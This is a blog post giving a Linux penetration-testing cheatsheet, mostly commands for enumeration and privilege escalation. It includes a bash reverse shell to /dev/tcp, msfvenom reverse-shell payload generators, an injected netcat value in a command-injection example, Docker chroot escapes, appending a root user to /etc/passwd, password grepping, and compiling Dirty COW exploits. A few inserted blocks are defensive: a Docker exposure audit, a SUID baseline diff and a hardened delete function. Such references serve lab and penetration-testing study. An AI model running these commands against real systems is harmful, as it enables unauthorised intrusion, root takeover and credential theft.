======================
== gkourgkoutas.net ==
======================
Rethink Security

Linux Cheatsheet

security linux cheats tools privesc

Writing a full hands-on of BloodHound takes more time than I thought, so Part II is going to be delayed until I'm fully satisfied with the results. In the meantime I thought I would share some of my Linux cheats, which I use mostly for enumeration and privilege escalation. A lot of the following commands come from labs, cheatsheets, writeups, friends and colleagues, trial and error, and are also copied from well-known places like HackTricks and ired.team.

Nmap

Scan with several script wildcards. Nickname: Big Boy Scan

$ sudo nmap -A -sV -O --min-rate 600 --script "(vuln or exploit or auth) and not broadcast" -oA <rhost>-script <rhost> -p <ports>

Search nmap scripts by category (default, version, safe) and filter them for a keyword (here smb)

$ locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb

Run a whole script category against one port

$ nmap --script safe -p 445 <ip>

Python

Webserver

Spawn a webserver in current directory

$ python3 -m http.server <port>

Ports like 80, 443, 445 etc. need root privileges (all ports below 1024 do).

Upgrade shell

$ python -c 'import pty; pty.spawn("/bin/bash")'

IMPORTANT: pay attention to which Python version is installed and used on the target system; if necessary use python3:

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Virtual Environment

For some exploits older Python versions like 2.7 work better; sometimes only the Python 2.7 exploits work at all. In that case create the virtual environment with Python 2.

Create

Python 3

$ python3 -m venv /path/to/venv/MyVenv

Python 2

$ virtualenv -p /usr/bin/python2.7 MyVenv

Activate

$ source MyVenv/bin/activate

Deactivate (Both)

$ deactivate

Dirsearch

Two bash one-liners for dirsearch output: the first filters the HTTP 200 responses (plus the Target line), the second opens all of them in Firefox

$ grep -i '200\|Target' <file>

Paste the output into a file; the second one-liner asks for the path to it (the commands are separated with ; so that read runs in the foreground and only firefox is backgrounded)

$ echo "Enter path to temporary file:"; read -r file; firefox & baseUrl=$(cat "${file}" | grep "Target: " | awk -F "http" '{print $2}' | cut -d "^" -f 1) && baseUrl=${baseUrl%?} && cat "${file}" | grep -v "Last request to" | grep "200 -" | cut -d "-" -f 3 | cut -d "^" -f 1 | sed "s/ //" | awk -v url="$baseUrl" '{print "firefox -url http" url $0}' | bash

Netcat

Connect

$ nc -vv <ip> <port>

Listen

$ nc -lvnp <port>

Shell

After Python Upgrade

# Send the reverse shell to the background
CTRL + Z
# Type into your local shell
stty raw -echo
# Bring the reverse shell back to the foreground
fg
# To use clear and tab completion
export TERM=xterm

Restricted Shells (rbash)

$ ssh <user>@<ip> -t "bash --noprofile"

Write into /etc/passwd

Append a line in the following format to /etc/passwd; the $(...) part generates the password hash with openssl

<user>:$(openssl passwd -1 -salt <user> <password>):0:0:root:/bin/bash

Docker

Sometimes misconfigurations in Docker lead to easy privilege escalations. Membership in the docker group is a good indicator:

$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),30(dip),
46(plugdev),110(lpadmin),111(sambashare),122(docker)

LinPEAS [1] also finds this reliably, with the following output:

[+] Analyzing .socket files
[...]
Docker socket /var/run/docker.sock is writable
[...]

Exploit

There are several ways to exploit this misconfiguration:

$ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
$ sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh

More of these can be found here: https://www.hackingarticles.in/docker-privilege-escalation/
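An added audit helper (not from the original post) that checks the two indicators described above on a host: docker group membership in the output of id, and a writable /var/run/docker.sock. The function names are my own; the id line and socket path are parameters so the checks can also be run against captured output.

```shell
#!/bin/sh
# Added audit helper, not from the original post. It checks the two indicators
# the text describes: membership in the docker group and a writable docker
# socket. Either one lets a user start a container that mounts / and so gives
# root on the host, which is why both deserve an alert.

# 0 when an `id` output line lists the docker group, 1 otherwise.
in_docker_group() {
    printf '%s\n' "$1" | grep -Eq '[0-9]+\(docker\)'
}

# 0 when the "other" write bit is set on $1 (column 9 of ls -ld), 1 otherwise.
# ls is used instead of stat -c so the check also runs on busybox and BSD.
other_writable() {
    [ -e "$1" ] || return 1
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# Run both checks on this host; prints one line per finding and returns 1
# when anything was found. $1 overrides the socket path (default as in LinPEAS).
audit_docker_exposure() {
    sock=${1:-/var/run/docker.sock}
    hits=0
    if in_docker_group "$(id)"; then
        echo "[!] $(id -un) is in the docker group (root-equivalent via docker run -v /:/mnt)"
        hits=$((hits + 1))
    fi
    if [ -S "$sock" ]; then
        if [ -w "$sock" ]; then
            echo "[!] $sock is writable by $(id -un)"
            hits=$((hits + 1))
        fi
        if other_writable "$sock"; then
            echo "[!] $sock is world-writable (any local user can drive the daemon)"
            hits=$((hits + 1))
        fi
    fi
    [ "$hits" -eq 0 ]
}

audit_docker_exposure "$@" && echo "[+] no docker exposure indicators found"
```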

Search for writable directories and for files containing passwords (the -l variant lists only the file names)

$ find / -writable -type d 2>/dev/null
$ grep -lRi "password" /home /var/www /var/log 2>/dev/null | sort | uniq
$ grep -Ri "password" /home /var/www /var/log 2>/dev/null | sort | uniq

MSFVENOM

Powershell

$ msfvenom --platform windows -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f vba-psh

Java/JSP

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<host> LPORT=<port> -f raw > shell.jsp

WAR (JSP)

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<host> LPORT=<port> -f war > shell.war

Creates an unstaged x86 shell

$ msfvenom -p windows/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe > shell.exe

Creates an unstaged x64 shell

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe > shell.exe

Staged payload: windows/x64/meterpreter/reverse_tcp

Unstaged: windows/shell_reverse_tcp

More examples of MSFVenom reverse shells: MSFVenom Reverse Shell Cheatsheet

SSH

Troubleshooting the following SSH error:

Unable to negotiate with <ip> port 22: no matching key exchange method found.
Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

  • Check which authentication methods are allowed (password, key)
  • If password-based authentication is allowed, use the following command with one of the offered algorithms

$ ssh -l <user> <ip> -oKexAlgorithms=<one of the offered algorithms>

User management

Change user

$ su <username>

Files with root privileges

Use the following command to determine if some program can be run as root:

$ sudo -l 
(ROOT) /usr/bin/perl

Then execute it with the full path

$ sudo /usr/bin/perl <command>

A good read: https://gtfobins.github.io/

SUID BITS

Are there any interesting SUID bits?

If the binary is executable:

  • Which commands does it use? Are files/directories modified or created?
    • If you can modify such a file, try to write a shell into it
    • For example a bash reverse shell:
      $ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

If it's not executable:

  • Use the strings command to see what the binary does and whether there is any lead. Otherwise google the name of the binary. You can also look it up on https://gtfobins.github.io/
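The SUID hunt above starts with a listing. As an added example (not from the original post, function names are my own) here is the defender's version of it: snapshot the setuid/setgid files once and diff later snapshots against it, so a binary that gained the bit, or a new one dropped onto the box, stands out. It covers setgid as well, which the text does not mention.

```shell
#!/bin/sh
# Added example, not from the original post: snapshot the setuid/setgid files
# on a host and diff later snapshots against it. An entry that appears only in
# the new snapshot is either a binary that gained the bit or a new file, both
# of which deserve a look.

# Print "mode owner path" for every setuid or setgid regular file under $1,
# one per line and sorted so comm(1) can compare two listings. -xdev keeps
# find on one filesystem; errors from unreadable directories are discarded.
suid_list() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        set -- $(ls -ld "$f")            # $1 = mode string, $3 = owner
        printf '%s %s %s\n' "$1" "$3" "$f"
    done | LC_ALL=C sort
}

# Lines in the new listing ($2) that are absent from the baseline ($1).
# Prints them and returns 1 when there is at least one, 0 when nothing changed.
suid_new() {
    added=$(LC_ALL=C comm -13 "$1" "$2")
    [ -z "$added" ] && return 0
    printf '%s\n' "$added"
    return 1
}

# Typical use: create the baseline once, then compare on every check.
#   suid_list / > /var/lib/suid.baseline
#   suid_list / > /tmp/suid.now && suid_new /var/lib/suid.baseline /tmp/suid.now
```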

SSH Private Key

If the following error occurs

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Permissions 0644 for 'rsakey' are too open.
It is required that your private key files are NOT accessible by others.

This private key will be ignored.

Load key "rsakey": bad permissions

Use chmod 600 on the private key.

Command Injection

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

We control $value in this command. If we fill it with 'nc <ip> <port> -c bash;', the semicolon terminates the rm command and the rest runs as a second command, which opens up a reverse shell.
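PHP's exec() hands its string to /bin/sh -c, so the vulnerable call and a hardened version can be reproduced directly in shell. This is an added example, not code from the original post; delete_unsafe and delete_safe are my own names and the directory, file names and payload are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. PHP's exec() hands its string to
# /bin/sh -c, so the vulnerable call and a hardened version can be shown in
# shell. nohup and the trailing & are left out only so the result can be
# observed synchronously; they do not change the injection.

# Vulnerable: $value is pasted into a command string. A ';' in it ends the rm
# command and whatever follows runs as well, redirect or no redirect.
delete_unsafe() {
    path=$1; value=$2
    sh -c "/bin/rm -f $path$value > /dev/null 2>&1"
}

# Hardened: accept only a plain file name (no '/', no leading '.', no shell
# metacharacters) and pass it to rm as a single argument instead of through
# a shell string; '--' keeps a name like -rf from being read as an option.
delete_safe() {
    path=$1; value=$2
    case $value in
        ''|*/*|.*|*[!A-Za-z0-9._-]*)
            echo "rejected file name: $value" >&2
            return 1 ;;
    esac
    /bin/rm -f -- "$path$value"
}

# Demonstration with a constructed payload that only creates a marker file.
demo() {
    dir=$(mktemp -d)
    touch "$dir/x" "$dir/y"
    delete_unsafe "$dir/" "x; touch $dir/INJECTED"
    [ -e "$dir/INJECTED" ] && echo "unsafe: injected command ran"
    delete_safe "$dir/" "y; touch $dir/INJECTED2" || echo "safe: payload rejected"
    delete_safe "$dir/" y && [ ! -e "$dir/y" ] && echo "safe: y deleted"
    rm -rf "$dir"
}
demo
```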

Also interesting:

Kernel exploit

DirtyCow

There are many variants of Dirty COW; the following two work most of the time

  • 40839.c (Pokemon)

    • Compile with the following command
      $ gcc -pthread 40839.c -o <name> -lcrypt
      
    • This creates a user firefart and prompts for a password
  • 40611.c (The “original” DirtyCow exploit)

    • Compile with the following command
      $ gcc -pthread 40611.c -o dirtcow
      
    • Asks for a file which needs to be modified. Ideally a new user is written into /etc/passwd

  1. https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS